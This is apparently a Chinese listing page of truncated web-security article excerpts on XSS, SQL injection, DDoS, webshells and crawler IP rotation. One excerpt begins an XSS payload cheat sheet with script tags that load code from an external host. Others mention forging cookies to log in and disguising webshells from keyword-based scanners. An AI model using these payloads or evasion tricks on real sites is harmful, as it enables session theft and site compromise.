脚本攻防

1 背景概述 WEB应用漏洞导致的入侵时有发生，扫描器和WAF并不能解决所有的问题，于是尝试在主机侧针对PHP环境做了一个防御方案。很荣幸的邀请到TSRC部分白帽子做了一次对抗演习，本文主要分享一下防御思路。 防御方案主要想解决的问题是getshell...

一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本，当目标网站目标用户浏览器渲染HTML文档的过程中，出现了不被预期的脚本指令并执行时，XSS就发生了。 二、XSS分类 XSS有三类：反射型XSS(非持久型)、存储型XS...

ddos攻击的意思是指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，最后可以成倍地提高拒绝服务攻击的威力。 DDos攻击在今天看来并不新鲜，近两年来发展态势也渐趋平缓，直至一个月前，欧洲反垃圾邮件组织Spa...

本文详细讲述了 sql注入的原理及防范技巧，目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。 一、 介绍 　　当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内...

(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=htt...

方法1.之前由于公司项目需要，采集过google地图数据，还有一些大型网站数据。经验如下：1.IP必须需要，像@alswl 说的非常正确，ADSL。如果有条件，其实可以跟机房多申请外网IP。2.在有外网IP的机器上，部署代理服务器。3.你的程序，使用轮...

转自wooyun http://www.wooyun.org/bugs/wooyun-2014-078591 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456) 登录成功设置4个cookie,看代码 PHP ...

上次有说过，我在新公司有部分工作是负责爬虫业务的，爬虫机器有上百台，节点也要计划迁入了Docker平台上。 这两天遇到一个棘手的问题，就是因为我们为了追求数据量，在某些机房，用docker启动了不少爬虫节点，导致一些傻逼网站，开始封禁我们&hellip...

0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. 0×0...

这类攻击有一个最大的特性，就是上传流量霎时增大，通常流量高达数十以至近百M，将整台效 劳器，以至将整台机柜的宽带堵住，使网站无法运转，而这样的攻击，我们无法从远程处理，一但那个phpshell运转，你的宽带将被全部占用，远程都无法 衔接。 　　被攻击后...

=============安全性篇目录============== 毕业开始从事winfrm到今年转到 web ，在码农届已经足足混了快接近3年了，但是对安全方面的知识依旧薄弱，事实上是没机会接触相关开发……必须的各种借口。...

网络上的SQL Injection 漏洞利用攻击，JS脚本，HTML脚本攻击似乎逾演逾烈。陆续的很多站点都被此类攻击所困扰，并非像主机漏洞那样可以当即修复，来自于WEB的攻击方式使我们在防范或者是修复上都带来了很大的不便。一个站长最大的痛苦莫过于此。自...